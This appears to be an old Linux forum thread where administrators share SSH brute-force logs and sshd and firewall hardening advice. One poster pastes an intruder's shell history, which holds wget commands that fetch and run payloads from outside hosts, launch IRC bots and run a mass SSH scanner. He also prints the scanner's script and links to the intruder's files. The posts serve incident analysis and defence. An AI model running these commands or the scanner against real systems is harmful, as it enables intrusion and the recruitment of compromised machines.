most of the attacks keep repeating and i'm ready to just block the IPs. it's rare a new IP shows up.

----------

## M4554KK3R

 *BlinkEye wrote:*   

>  *many users wrote:*   lot's of quotes omitted here  
> 
> i'm still very much interested in that feature because i use openSSH too! any hint?

 

dunno if this is what you want, but man 5 sshd_config tells you

```
UseDNS

Specifies whether sshd should lookup the remote host name and check that the resolved host name for the remote IP address maps back to the very same IP address.  The default is ``yes''.
```

this is also a problem if you try to login via a dyndns-ip because you try to login from foo.dyndns.org (or homelinux or whatever) but your ip number translates back to your.foo.isp.com and you're kicked out

----------

## CarlUman

 *Valhlalla wrote:*   

> My system is set up to email me any failed logins, but since I'm parranoid I'm going to check anyway 

 

I might have missed it but could you tell me how this is done.

Thanks much

Carl

----------

## evoweiss

Hi all,

This continues to be a good thread and I recently had a number of attempted break-ins from somebody on the Roadrunner system (whois is your friend  :Smile: ).

Anyway, the latest attempts all were trying to login as mysql. There is a mysql user that can be set up, but I've got it disabled on my box as I am not running mysql. If you are, by chance, running mysql, you may want to change passwords, make sure you're up to date, etc.

Incidentally, while it's hard to go after these folks legally (especially if they're in other countries), I have found that emailing their ISPs a polite request that they do something to stop the behavior (and emailing them all the relevant information, i.e., your IP address, the log files, etc.) is very effective. Most of the time, especially with hack attempts coming from Asian countries, I never hear from the ISP, but the attacks stop. I suspect many attacks are using compromised accounts and that, when notified, the ISPs notify the owner of the account or box and get them to fix whatever the problem is.

I do like the idea of keeping a record of where attacks come from, especially as it might be useful to block some particularly troublesome ISPs. One could probably right up a nice paper with all that information.

Best,

Alex

----------

## C0deM0nkey

Hi all,

I know thread has basically been abandoned, but I feel that it is a good thread and surprisingly enough, one of my servers has received unathorised ssh access attempts for 1 week now.

Each day its a different ip address, generally its in asia, but occasionally its in Europe or the US. It appears to be either a script or a worm. And mostly it attempts to login using common service names and common names.

In response to this ssh has been disabled for root and all users except 1 user. The 1 user that can login is an obscure username I made up, and this user is a member of the wheel group.

Previously, when I first noticed the access attempts, there were also ftp access attempts from the same machines. So I have also completely removed ftp for the time being, given that there is only 1 active domain on the system, and I know all the members of that domain, I have informed all users that ftp has been restricted and to email me files that need to be ftp'd and I will put the file(s) up for them.

I have a list of a handfull of ip addresses, which as I said changes daily, and am happy to share them with the group, I can also provide my logwatch emails for anyone that may find them usefull.

Since the ip addresses change daily to different parts of the world blocking these ip's individually on my box seems futile, the ip's arent listed on dshield as known compromised machines either. So at the moment Im playing chase, each morning I check my logs look up the ip and the correct IANA database and email the appropriate admins.

Has anyone got any further ideas to help me (a) lockdown the box (b) stop these attempts occuring, since they con concern me.

Many Thanks, Code Monkey

----------

## infecticide

Looks like they're trying me now. 

```
Oct 31 06:20:09 [sshd(pam_unix)] authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=212.100.

Oct 31 06:20:11 [sshd] Failed password for invalid user test from ::ffff:212.100.197.34 port 48325 ssh2

```

----------

## xbmodder

wow anyone know what virus this is? i got myself hacked:

bash hist

su - root

mkdir .ssh

w

hostname

cd /var/tmp/

wget

wget carmelog.go.ro/do.tgz

rm -rf no_user.phtml

wget carmelo.go.ro/do.tgz

tar zxvf do.tgz

rm -rf do.tgz

chmod +x do

./do

./do

rm -rf do

wget carmelo.go.ro/90

chmod +x 90

./90

rm -rf 90

passwd

wget antohi.home.ro/okas.tgz

mv okas.tgz /var/tmp/

tar zxvf okas.tgz

rm -rf okas.tgz

cd okas

./assh 64.24

w

cd /var/tmp/

wget antohi.home.ro/ryo.tar.gz

tar zxvf ryo.tar.gz

rm -rf ryo.tar.gz

cd .access.log

./config baronu 112233

./duck

./run

cd ..

cd okas

./assh 166.70

./assh 166.71

./assh 67.117

w

cd /var/tmp/

cd okas

./assh 64.24

cd /var/tmp/

cd okas

./assh 69.137

./assh 218.110

./assh 218.111

./assh 218.112

./assh 218.114

./assh 218.116

cd /var/tmp/

cd okas

./assh 218.101

./assh 218.102

./assh 218.103

w

cd /var/tmp/

wget scaryx.home.ro/clone.tgz

tar zxvf clone.tgz

rm -rf clone.tgz

cd mirkforce/

ls

pico id

./mirkforce

/load miami.fl.us.undernet.org 6667 500 0

ls

cd ..

rm -rf mirkforce

wget www.nirvana.as.ro/emech.tar.gz

tar zxvf emech.tar.gz

rm -rf emech.tar.gz

cd .emech/

ls

./m

./m

./m

./m

./m

./m

cd /var/tmp/

cd okas

./assh 212.118.

./assh 212.118

./assh 212.119

./assh 212.202

./assh 212.113

./assh 212.203

./assh 212.204

w

cd /etc/mysql/my.cnf

cd /var/tmp/

cd emech

ls -all

cd .emech

ls

./m

cd ..

cd okas

./assh 66.165

cd /var/tmp/

cd okas

./assh 66.165

./assh 66.166

cd /var/tmp/

cd okas

./assh 66.166

./assh 66.167

cd /var/tmp/

cd okas

./assh 210.179

./assh 210.179

cd /var/tmp/

w

cd okas

./assh 200.178

cd /vbar/tmp/

cd okas

cd /var/tmp/.

cd okas

./assh 213.172

cd /var/tmp/. /var/tmp/.

cd okas

./assh 66.207

./assh 66.208

I think its a script made to look stupid!

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2SbC35l5mJgI67YiZEJbRMxoQyHZSitHAxdGm \

CwFs2ah5Da3B2uPs5ufqTVw7bdPIKQ0gbulQItvhO26GzdYK1I7aFBe+P0fZsPyKR/9+Y \

etUmGE96iTa3ShvscAjULdsTPetaMEcfBSqueUTBW2/JdDFgJgoLAf1HhhREfnGJE= test

mod edit: fixed problem with linewrapping of ssh-rsa key.

amne

this guy left all of the attack on my system do you guys want it (seems like 

he was in the middle) u guys want i have secured everything. im sorry for everyone i damaged. i saw  the log of everyone i managed to hack quite impressive actually.

we need this bug

----------

## xbmodder

here are all the files: 

http://xbmodder.us/for.tar.bz2

w00t

----------

## Parasietje

I protected my sshd by only allowing my main user from the internet. Root is allowed from the clients that have a DNS adress in my local lan. Only certain MAC-addresses get a Dynamic DNS adress.

That way, even with physical acces to my network, you can't log in root.

----------

## amne

xbmodder: Judging from the logs it is hard to tell how far he got. Seems he tried to get root access, hard to tell if he was successful. He also tried to install some irc-client that listens to commands (zombie).

Where did you find the "ssh-rsa AAAAB3NzaC1y..."-string? It looks like an authorized_keys(2) file, that allows logins without typing a password in ssh.

----------

## venquessa2

Interesting thread, just throwing my 2 pence in.

iptables firewall is a good start, although the posted example back on page 1 or 2 is OTT, there is no need what so ever for all those drops, just set the INPUT and/or FORWARD chains to default DROP policy, then enable specific ports you want.  The filtering of bad flags and syn floods etc I didn't know about, thanks.  For firewalls connecting lans to the net using NAT (or MASQing) a good set of rules should be added to prevent IP to IP packets that "can't" exist, to help catch firewall spoofs, eg.  DROP all localhost that isn't from localhost, drop all LAN ips coming from the WAN interface and so on.

iptables firewall will not help if you want to have an insecure service open.  sshd is as insecure as telnet if you have insecure user account and/or passwords.  If you are not using a service close it.  If you are not using a user account delete the password, scramble it by adding rubbish into /etc/shadow in place of the password, or set the shell to /bin/false or /dev/null

If you require sshd logins, do as suggested elsewhere and only allow from specific IPs.  If you can't and want to log in with putty from various places, like on a laptop dialup account, then consider  a knock-knock trapdoor.  The trick is you firewall the shhd port, DROP, but run a service on a unregistered port that accepts an odd and unique challenge, NOT a protocol or password challenge, if successful it opens the sshd port for 20 seconds and then closes it to SYNs again.  All you need is a little perl know how and it's not that tricky.

DONT allow sshd root logins!  The option is in /etc/ssh/sshd.conf

Be careful about allowing trusted user accounts ssh access, users that can for example su with no password.

And finally some food for thought for all those who patiently searched through their logs....

Do you honestly think that if the person attacking actually got your root password that the 

"Accepted password for root from 81.x.x.x port 1058"

would still be in the log file?  Think again.  So when you look through all those logs and you see multiple attempts to gain root and no apparent success, remember the success might simply have been deleted, along with everything else that would leave trace.

Look into using remote logging if you can.

It all depends on what you are protecting, but at least lock the doors and windows when you go out.

----------

## xbmodder

here is my report so far:

ok this is pretty simple

he got a program "do.tgz" to probe for something

strace head -n 20:

execve("./do", ["./do"], [/* 46 vars */]) = 0

uname({sys="Linux", node="gallantweb", ...}) = 0

fcntl64(0, F_GETFD)                     = 0

fcntl64(1, F_GETFD)                     = 0

fcntl64(2, F_GETFD)                     = 0

geteuid32()                             = 1000

getuid32()                              = 1000

getegid32()                             = 100

getgid32()                              = 100

brk(0)                                  = 0x88a6000

brk(0x88a7000)                          = 0x88a7000

getuid32()                              = 1000

brk(0x88a9000)                          = 0x88a9000

munmap(0x88a9000, 3077926912)           = 0

brk(0x88aa000)                          = 0x88aa000

brk(0x88ab000)                          = 0x88ab000

brk(0x88ac000)                          = 0x88ac000

and the brk(0x...)                      = 0x...

continues forever, i believe this is probing ram for exploits or

overflow or somthing...

the assh program seems to be a scanner for living computers...

hmmm ryo program no clue?!?

the hacker seems to be spanish hmmm...

the .access.log thing is == ryo

this is kinda wierd i used this account before and i left my bash's

history at a lot higher. 500+ and some of it is missing...

clone did not work

cuz it need uid==0

miami.fl.us.undernet.org is the server he used you could look at my

files and try to look at the channel and see what u can do?

emech seems to be a IRC bot...

maybe a script kiddie thingy with the mysql thing. or not...

----------

## vdboor

This might be something interesting to make ssh more secure:

Set these settings in sshd_config:

```
Protocol 2       # only 2, removes support for protocol 1

PermitRootLogin no

AllowUsers (yourname here)
```

This makes sure no one gets ssh access except the few users you allow. (you can also use AllowGroups instead of AllowUsers to be more flexible)

There are some good tips in this howto.. anyone likes to make a gentoo-wiki "I got hacked howto"?   :Cool: 

edit: added comment.

----------

## Chewi

Cripes, I didn't expect to be target but I just checked and there was an IRC bot trying very hard to get in just 3 days ago and there were a couple more attempts yesterday! This didn't used to happen to me but I'm now back in college on what I guess is a higher profile connection.

----------

## GenKreton

I get tens to hundreds attempts a day from people on my ssh on my server at home which runs apache, unrealircd, and vsftpd. I realize hosting an irc server on a medium sized network puts me at a higher risk for hacking attempts. I am already behid a linksys wrt54g router, and running iptables just-incase. With that said, I NEED ssh while I am at school to administer my server. Root is never allowed to login, and in fact, I do not permit password logins, only key based. So I am fairly confident in my security BUT I would like to slow these attempts down. 

Is there a simple way to allow one attempt every couple of minutes on only port 22?

----------

## z3ro

Perhaps that "assh" program stands for automated-ssh? So maybe it tried to connect to computers and attack them with pre-scripted commands.

----------

## xbmodder

zero no it scans compy here is a copy:

#!/bin/bash

if [ $# != 1 ]; then

        echo " usage: $0 <b class>"

        exit;

fi

echo "       Versiune de scaner privata!"

echo "----------------------------------------------------"

echo "           All my love for Liz!                     "

echo "----------------------------------------------------"

echo "# incep scanarea ..."

./pscan2 $1 22

sleep 10

cat $1.pscan.22 |sort |uniq > uniq.txt

oopsnr2=`grep -c . uniq.txt`

echo "# Am gasit $oopsnr2 de servere"

echo "----------------------------------------"

echo "# Incepem..."

./sshf 50

rm -rf $1.pscan.22 uniq.txt

echo "Asta a fost tot"

basically scans for working IPs with ssh that are hackable

----------

## mholtz

I've been seeing batches of ssh hack attempts like the following for the past month.  They come from a different IP each time, but the attempted username pattern is always the same, indicating a script.  This makes me wonder if the IPs which are attempting the attacks are already compromised.

```

Nov  5 09:22:57 [sshd] Failed password for nobody from 80.55.69.14 port 53986 ssh2

Nov  5 09:22:59 [sshd] Failed password for illegal user patrick from 80.55.69.14 port 33645 ssh2

Nov  5 09:23:00 [sshd] Failed password for illegal user patrick from 80.55.69.14 port 59775 ssh2

Nov  5 09:23:02 [sshd] Failed password for root from 80.55.69.14 port 50049 ssh2

Nov  5 09:23:04 [sshd] Failed password for root from 80.55.69.14 port 54201 ssh2

Nov  5 09:23:06 [sshd] Failed password for root from 80.55.69.14 port 39974 ssh2

Nov  5 09:23:08 [sshd] Failed password for root from 80.55.69.14 port 56309 ssh2

Nov  5 09:23:10 [sshd] Failed password for root from 80.55.69.14 port 51384 ssh2

Nov  5 09:23:12 [sshd] Failed password for illegal user rolo from 80.55.69.14 port 53286 ssh2

Nov  5 09:23:14 [sshd] Failed password for illegal user iceuser from 80.55.69.14 port 58738 ssh2

Nov  5 09:23:16 [sshd] Failed password for illegal user horde from 80.55.69.14 port 50973 ssh2

Nov  5 09:23:18 [sshd] Failed password for cyrus from 80.55.69.14 port 51924 ssh2

Nov  5 09:23:20 [sshd] Failed password for illegal user www from 80.55.69.14 port 33293 ssh2

Nov  5 09:23:27 [sshd] Failed password for illegal user wwwrun from 80.55.69.14 port 45285 ssh2

Nov  5 09:23:29 [sshd] Failed password for illegal user matt from 80.55.69.14 port 49633 ssh2

Nov  5 09:23:31 [sshd] Failed password for illegal user test from 80.55.69.14 port 58880 ssh2

Nov  5 09:23:33 [sshd] Failed password for illegal user test from 80.55.69.14 port 59901 ssh2

Nov  5 09:23:36 [sshd] Failed password for illegal user test from 80.55.69.14 port 43295 ssh2

Nov  5 09:23:38 [sshd] Failed password for illegal user test from 80.55.69.14 port 53466 ssh2

Nov  5 09:23:40 [sshd] Failed password for illegal user www-data from 80.55.69.14 port 45534 ssh2

Nov  5 09:23:42 [sshd] Failed password for mysql from 80.55.69.14 port 60840 ssh2

Nov  5 09:23:44 [sshd] Failed password for operator from 80.55.69.14 port 45907 ssh2

Nov  5 09:23:47 [sshd] Failed password for adm from 80.55.69.14 port 50406 ssh2

Nov  5 09:23:49 [sshd] Failed password for apache from 80.55.69.14 port 49007 ssh2

Nov  5 09:23:51 [sshd] Failed password for illegal user irc from 80.55.69.14 port 36609 ssh2

Nov  5 09:23:53 [sshd] Failed password for illegal user irc from 80.55.69.14 port 35043 ssh2

Nov  5 09:23:55 [sshd] Failed password for adm from 80.55.69.14 port 34949 ssh2

Nov  5 09:23:58 [sshd] Failed password for root from 80.55.69.14 port 43156 ssh2

Nov  5 09:24:00 [sshd] Failed password for root from 80.55.69.14 port 35519 ssh2

Nov  5 09:24:02 [sshd] Failed password for root from 80.55.69.14 port 52846 ssh2

Nov  5 09:24:04 [sshd] Failed password for illegal user jane from 80.55.69.14 port 44178 ssh2

Nov  5 09:24:06 [sshd] Failed password for illegal user pamela from 80.55.69.14 port 43102 ssh2

Nov  5 09:24:09 [sshd] Failed password for root from 80.55.69.14 port 42372 ssh2

Nov  5 09:24:11 [sshd] Failed password for root from 80.55.69.14 port 55090 ssh2

Nov  5 09:24:14 [sshd] Failed password for root from 80.55.69.14 port 43227 ssh2

Nov  5 09:24:15 [sshd] Failed password for root from 80.55.69.14 port 41264 ssh2

Nov  5 09:24:17 [sshd] Failed password for root from 80.55.69.14 port 47928 ssh2

Nov  5 09:24:19 [sshd] Failed password for illegal user cosmin from 80.55.69.14 port 46743 ssh2

Nov  5 09:24:21 [sshd] Failed password for root from 80.55.69.14 port 43489 ssh2

Nov  5 09:24:23 [sshd] Failed password for root from 80.55.69.14 port 41965 ssh2

Nov  5 09:24:25 [sshd] Failed password for root from 80.55.69.14 port 46024 ssh2

Nov  5 09:24:27 [sshd] Failed password for root from 80.55.69.14 port 50061 ssh2

Nov  5 09:24:29 [sshd] Failed password for root from 80.55.69.14 port 35590 ssh2

Nov  5 09:24:31 [sshd] Failed password for root from 80.55.69.14 port 48908 ssh2

Nov  5 09:24:33 [sshd] Failed password for root from 80.55.69.14 port 55080 ssh2

Nov  5 09:24:35 [sshd] Failed password for root from 80.55.69.14 port 52116 ssh2

Nov  5 09:24:37 [sshd] Failed password for root from 80.55.69.14 port 48554 ssh2

Nov  5 09:24:39 [sshd] Failed password for root from 80.55.69.14 port 40857 ssh2

Nov  5 09:24:40 [sshd] Failed password for root from 80.55.69.14 port 57402 ssh2

Nov  5 09:24:42 [sshd] Failed password for root from 80.55.69.14 port 57838 ssh2

Nov  5 09:24:44 [sshd] Failed password for root from 80.55.69.14 port 41711 ssh2

Nov  5 09:24:46 [sshd] Failed password for root from 80.55.69.14 port 58428 ssh2

Nov  5 09:24:48 [sshd] Failed password for root from 80.55.69.14 port 58584 ssh2

Nov  5 09:24:50 [sshd] Failed password for root from 80.55.69.14 port 35320 ssh2

Nov  5 09:24:52 [sshd] Failed password for root from 80.55.69.14 port 41857 ssh2

Nov  5 09:24:53 [sshd] Failed password for root from 80.55.69.14 port 42786 ssh2

Nov  5 09:24:55 [sshd] Failed password for root from 80.55.69.14 port 38851 ssh2

Nov  5 09:24:57 [sshd] Failed password for root from 80.55.69.14 port 46666 ssh2

Nov  5 09:24:59 [sshd] Failed password for root from 80.55.69.14 port 48532 ssh2

Nov  5 09:25:01 [sshd] Failed password for root from 80.55.69.14 port 32773 ssh2

Nov  5 09:25:03 [sshd] Failed password for root from 80.55.69.14 port 37715 ssh2

Nov  5 09:25:10 [sshd] Failed password for root from 80.55.69.14 port 48976 ssh2

Nov  5 09:25:11 [sshd] Failed password for root from 80.55.69.14 port 56698 ssh2

Nov  5 09:25:13 [sshd] Failed password for root from 80.55.69.14 port 36625 ssh2

Nov  5 09:25:15 [sshd] Failed password for root from 80.55.69.14 port 52868 ssh2

Nov  5 09:25:17 [sshd] Failed password for root from 80.55.69.14 port 54695 ssh2

Nov  5 09:25:19 [sshd] Failed password for root from 80.55.69.14 port 52670 ssh2

Nov  5 09:25:21 [sshd] Failed password for root from 80.55.69.14 port 53967 ssh2

Nov  5 09:25:23 [sshd] Failed password for root from 80.55.69.14 port 54874 ssh2

Nov  5 09:25:25 [sshd] Failed password for root from 80.55.69.14 port 53118 ssh2

Nov  5 09:25:26 [sshd] Failed password for root from 80.55.69.14 port 49851 ssh2

Nov  5 09:25:28 [sshd] Failed password for root from 80.55.69.14 port 45027 ssh2

Nov  5 09:25:30 [sshd] Failed password for root from 80.55.69.14 port 53901 ssh2

Nov  5 09:25:34 [sshd] Failed password for root from 80.55.69.14 port 57162 ssh2

Nov  5 09:25:35 [sshd] Failed password for illegal user cip52 from 80.55.69.14 port 35068 ssh2

Nov  5 09:25:37 [sshd] Failed password for illegal user cip51 from 80.55.69.14 port 49677 ssh2

Nov  5 09:25:39 [sshd] Failed password for root from 80.55.69.14 port 40956 ssh2

Nov  5 09:25:41 [sshd] Failed password for illegal user noc from 80.55.69.14 port 51422 ssh2

Nov  5 09:25:43 [sshd] Failed password for root from 80.55.69.14 port 34683 ssh2

Nov  5 09:25:44 [sshd] Failed password for root from 80.55.69.14 port 49075 ssh2

Nov  5 09:25:46 [sshd] Failed password for root from 80.55.69.14 port 51460 ssh2

Nov  5 09:25:48 [sshd] Failed password for root from 80.55.69.14 port 40586 ssh2

Nov  5 09:25:50 [sshd] Failed password for illegal user webmaster from 80.55.69.14 port 47403 ssh

Nov  5 09:25:52 [sshd] Failed password for illegal user data from 80.55.69.14 port 56472 ssh2

Nov  5 09:25:54 [sshd] Failed password for illegal user user from 80.55.69.14 port 60850 ssh2

Nov  5 09:25:56 [sshd] Failed password for illegal user user from 80.55.69.14 port 44799 ssh2

Nov  5 09:25:58 [sshd] Failed password for illegal user user from 80.55.69.14 port 49113 ssh2

Nov  5 09:25:59 [sshd] Failed password for illegal user web from 80.55.69.14 port 39841 ssh2

Nov  5 09:26:01 [sshd] Failed password for illegal user web from 80.55.69.14 port 42015 ssh2

Nov  5 09:26:03 [sshd] Failed password for illegal user oracle from 80.55.69.14 port 40639 ssh2

Nov  5 09:26:05 [sshd] Failed password for illegal user sybase from 80.55.69.14 port 52801 ssh2

Nov  5 09:26:07 [sshd] Failed password for illegal user master from 80.55.69.14 port 51732 ssh2

Nov  5 09:26:09 [sshd] Failed password for illegal user account from 80.55.69.14 port 40949 ssh2

Nov  5 09:26:10 [sshd] Failed password for illegal user backup from 80.55.69.14 port 50551 ssh2

Nov  5 09:26:13 [sshd] Failed password for illegal user server from 80.55.69.14 port 37708 ssh2

Nov  5 09:26:14 [sshd] Failed password for illegal user adam from 80.55.69.14 port 41895 ssh2

Nov  5 09:26:16 [sshd] Failed password for illegal user alan from 80.55.69.14 port 37845 ssh2

Nov  5 09:26:18 [sshd] Failed password for illegal user frank from 80.55.69.14 port 56533 ssh2

Nov  5 09:26:20 [sshd] Failed password for illegal user george from 80.55.69.14 port 58624 ssh2

Nov  5 09:26:22 [sshd] Failed password for illegal user henry from 80.55.69.14 port 37165 ssh2

Nov  5 09:26:24 [sshd] Failed password for illegal user john from 80.55.69.14 port 35399 ssh2

Nov  5 09:26:25 [sshd] Failed password for root from 80.55.69.14 port 36536 ssh2

Nov  5 09:26:27 [sshd] Failed password for root from 80.55.69.14 port 54497 ssh2

Nov  5 09:26:29 [sshd] Failed password for root from 80.55.69.14 port 38130 ssh2

Nov  5 09:26:30 [sshd] Failed password for root from 80.55.69.14 port 52827 ssh2

Nov  5 09:26:32 [sshd] Failed password for root from 80.55.69.14 port 43692 ssh2

Nov  5 09:26:34 [sshd] Failed password for illegal user test from 80.55.69.14 port 42997 ssh2

```

----------

## Anime_Fan

```
grep sshd /var/log/messages | grep "Failed password for root" | grep "Nov  3" | wc
```

Gives me 833 attempts. This all within a 30 minute span from a single IP (a.dns.kr. inverse.nic.or.kr.) ... *Sigh*. So this is what my precious bandwidth is spent on.

Most of the attacks on me are on the root user (not permitted login), However some attacks seem to have picked users from that machine's /etc/passwd (some oracle, some normal english named, some www/test/whatever).

Oh well. I guess it's time to research portknocking.

----------

## Mit

I got a load of these, noticed its started using other usernames too (patrick, iceuser, illegal, cyrus, www, wwwrun, matt, mysql, operator, adm, apache, irc, jane, pamela, cosmin, cip51, cip51, noc, webmaster, web, oracle, sybase, master, account, backup, server, adam, alan, frank, george, henry, john, admin)

as well as the standard NOUSER, test, user and root (rather a lot)

Annoyingly i can't lock ssh access to certain ips due to using dynamic ip's

----------

## braverock

 *Mben wrote:*   

> after reading this tread i took a look at my logs and found that i too had been probed. is there any way to report this?

 

I use the excellent logwatch and logcheck scripts, both of which are in portage.

I also use portsentry to shut down regular port scans, but this isn't a port scan.  

I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 

  - Brian

----------

## buzzin

I find running SSH on a non-standard highlevel port stops bots picking it up... Using this along with portsentry stops people portscanning to find the new port too. 

Get portsentry to listen on 22 once you have moved ssh to another port and these bots can be added to a automatic iptables drop rule.

----------

## TurkisH

 *vdboor wrote:*   

> This might be something interesting to make ssh more secure:
> 
> Set these settings in sshd_config:
> 
> ```
> ...

 

Thanks for this one, having added AllowUsers and PermitRootLogin no, gives me a safer feeling! I of course also had some SSH attempts:

```

Nov  4 15:43:41 [sshd] Illegal user frank from 210.233.67.132

Nov  4 15:43:41 [sshd] error: Could not get shadow information for NOUSER

Nov  4 15:43:41 [sshd] Failed password for illegal user frank from 210.233.67.132 port 37266 ssh2

Nov  4 15:43:43 [sshd] Illegal user george from 210.233.67.132

Nov  4 15:43:43 [sshd] error: Could not get shadow information for NOUSER

Nov  4 15:43:43 [sshd] Failed password for illegal user george from 210.233.67.132 port 37343 ssh2

Nov  4 15:43:45 [sshd] Illegal user henry from 210.233.67.132

Nov  4 15:43:45 [sshd] error: Could not get shadow information for NOUSER

Nov  4 15:43:45 [sshd] Failed password for illegal user henry from 210.233.67.132 port 37783 ssh2

Nov  4 15:43:48 [sshd] Illegal user john from 210.233.67.132

Nov  4 15:43:48 [sshd] error: Could not get shadow information for NOUSER

```

and it continues and continues  :Smile: 

btw what does: "Could not get shadow information for NOUSER" means?

----------

## vdboor

 *TurkisH wrote:*   

> what does: "Could not get shadow information for NOUSER" means?

 

I guess it can't find that entry in /etc/shadow, your shadow password file.

About the sshd_config stuff, changing the protocol line to "Protocol 2" (removing 1) makes it more secure as well, because ssh1 has an insecure design to start with.

 *Mit wrote:*   

> Annoyingly i can't lock ssh access to certain ips due to using dynamic ip's

 

But I guess these dynamic ip's appear in the same network range each time, and allow that entire range? Hope it helps  :Smile: 

 *braverock wrote:*   

> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 

 

What about adding a syslog-ng rule to redirect these messages to a separate file? If you use flags(final), syslog-ng won't store these messages in other files as well. I guess you could use "grep" from a cronjob to parse these IP addresses regulary, and update a special drop-chain with iptables.

edit: I just checked my log files, and it appears I'm having ssh attacks as well..  :Sad:  Unfortunately, I can't find an IP address in my logs, does anyone know what setting I need to change for that? I'm using syslog-ng.

----------

## Mit

I'm using Metalog - so for me they appear in /var/log/sshd/current (etc)

As for dynamic - its possible for me here at Uni, but then i'd hit a stalling block with a couple of other places i use (they have 4 or 5 ranges and are a bit all over the place)

If i get chance, gonna write something to parse the logs and add iptables rules and email me. This however is coursework permitting.

----------

## dsegel

 *braverock wrote:*   

> 
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 
> 
>   - Brian

 

You'd better also hope that the script allows at least 2 failed attempts or you'll find yourself locked out the first time you type your username or password wrong by accident.

----------

## Redeeman

i get alot of those login attempts too  :Smile:  with various usernames..

what i dont understand is that they feel its worth it, i mean, obviously alot people must have those crappy test/test accounts

----------

## DaveHope

Been looking into this, and it appears that there's an IRC channel full of these drones. (Machines which have been hacked, and are running a client which leaves them in an IRC channel). Not 100% yet, but am looking into it. I'm also tempted to setup a small honeypot and let them play for as long as need be.

----------

## madmango

Please. I wasn't getting any of these attacks until I was an idiot and pinged one of the addresses. Now I'm getting brute-forced all the time. Nobody's gotten in though.

Has somebody looked into WHEN these attacks are occuring? I get scanned around 7:10 PM (GMT-5).

Logs:

```
Nov  9 19:00:06 10.152.3.1 sshd[13095]: Did not receive identification string from 220.95.232.52

Nov  9 19:03:04 10.152.3.1 syslog-ng[6432]: STATS: dropped 90

Nov  9 19:06:14 10.152.3.1 sshd[13100]: Illegal user patrick from 220.95.232.52

Nov  9 19:06:16 10.152.3.1 sshd[13102]: Illegal user patrick from 220.95.232.52

Nov  9 19:06:28 10.152.3.1 sshd[13114]: Illegal user rolo from 220.95.232.52

Nov  9 19:06:31 10.152.3.1 sshd[13116]: Illegal user iceuser from 220.95.232.52

Nov  9 19:06:33 10.152.3.1 sshd[13118]: Illegal user horde from 220.95.232.52

Nov  9 19:06:37 10.152.3.1 sshd[13122]: Illegal user www from 220.95.232.52

Nov  9 19:06:39 10.152.3.1 sshd[13124]: Illegal user wwwrun from 220.95.232.52

Nov  9 19:06:41 10.152.3.1 sshd[13126]: Illegal user matt from 220.95.232.52

Nov  9 19:06:43 10.152.3.1 sshd[13128]: Illegal user test from 220.95.232.52

Nov  9 19:06:45 10.152.3.1 sshd[13130]: Illegal user test from 220.95.232.52

Nov  9 19:06:47 10.152.3.1 sshd[13132]: Illegal user test from 220.95.232.52

Nov  9 19:06:49 10.152.3.1 sshd[13134]: Illegal user test from 220.95.232.52

Nov  9 19:06:51 10.152.3.1 sshd[13136]: Illegal user www-data from 220.95.232.52

Nov  9 19:07:01 10.152.3.1 sshd[13146]: Illegal user irc from 220.95.232.52

Nov  9 19:07:03 10.152.3.1 sshd[13148]: Illegal user irc from 220.95.232.52

Nov  9 19:07:13 10.152.3.1 sshd[13158]: Illegal user jane from 220.95.232.52

Nov  9 19:07:15 10.152.3.1 sshd[13160]: Illegal user pamela from 220.95.232.52

Nov  9 19:07:27 10.152.3.1 sshd[13172]: Illegal user cosmin from 220.95.232.52Nov  9 19:08:44 10.152.3.1 sshd[13248]: Illegal user cip52 from 220.95.232.52

Nov  9 19:08:46 10.152.3.1 sshd[13250]: Illegal user cip51 from 220.95.232.52

Nov  9 19:08:50 10.152.3.1 sshd[13254]: Illegal user noc from 220.95.232.52

Nov  9 19:09:00 10.152.3.1 sshd[13264]: Illegal user webmaster from 220.95.232.52

Nov  9 19:09:02 10.152.3.1 sshd[13266]: Illegal user data from 220.95.232.52

Nov  9 19:09:04 10.152.3.1 sshd[13268]: Illegal user user from 220.95.232.52

Nov  9 19:09:06 10.152.3.1 sshd[13270]: Illegal user user from 220.95.232.52

Nov  9 19:09:08 10.152.3.1 sshd[13272]: Illegal user user from 220.95.232.52

Nov  9 19:09:10 10.152.3.1 sshd[13274]: Illegal user web from 220.95.232.52

Nov  9 19:09:12 10.152.3.1 sshd[13276]: Illegal user web from 220.95.232.52

Nov  9 19:09:14 10.152.3.1 sshd[13278]: Illegal user oracle from 220.95.232.52

Nov  9 19:09:16 10.152.3.1 sshd[13280]: Illegal user sybase from 220.95.232.52

Nov  9 19:09:18 10.152.3.1 sshd[13282]: Illegal user master from 220.95.232.52

Nov  9 19:09:20 10.152.3.1 sshd[13284]: Illegal user account from 220.95.232.52

Nov  9 19:09:22 10.152.3.1 sshd[13286]: Illegal user backup from 220.95.232.52

Nov  9 19:09:24 10.152.3.1 sshd[13288]: Illegal user server from 220.95.232.52

Nov  9 19:09:26 10.152.3.1 sshd[13290]: Illegal user adam from 220.95.232.52

Nov  9 19:09:28 10.152.3.1 sshd[13292]: Illegal user alan from 220.95.232.52

Nov  9 19:09:30 10.152.3.1 sshd[13294]: Illegal user frank from 220.95.232.52

Nov  9 19:09:32 10.152.3.1 sshd[13296]: Illegal user george from 220.95.232.52

Nov  9 19:09:34 10.152.3.1 sshd[13298]: Illegal user henry from 220.95.232.52

Nov  9 19:09:36 10.152.3.1 sshd[13300]: Illegal user john from 220.95.232.52

```

the list goes on.

Notice he's first portscanning my port 22 to ask if i've got a server up.

----------

## befa

if you wanna be more secure, edit your sshd.config and put that 

```
ListenAddress 192.168.0.1
```

i mean the ip adress from the interface turned to your network...

omg! my english...forgive me....

----------

## unicolet

 *revertex wrote:*   

> 
> 
> -edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group.
> 
> 

 

I would suggest disabling ssh protocol version 1 too. It is insecure and flawed.

 *revertex wrote:*   

> 
> 
> -install something like chkrootkit, integrit, snort, configure once and run forever, no excuses.
> 
> 

 

reinstall chkrookit after you think you have been rooted. Do not use a single rootkit checker. Try http://www.rootkit.nl/projects/rootkit_hunter.html too.

aide is an excellent Open Source tool (works like tripwire) for detecting less evident intrusions than yours. Configuration is easy and will check the integrity of your filesystem. Keep the database, config and binary in read-only media (like a floppy or a cdrom).

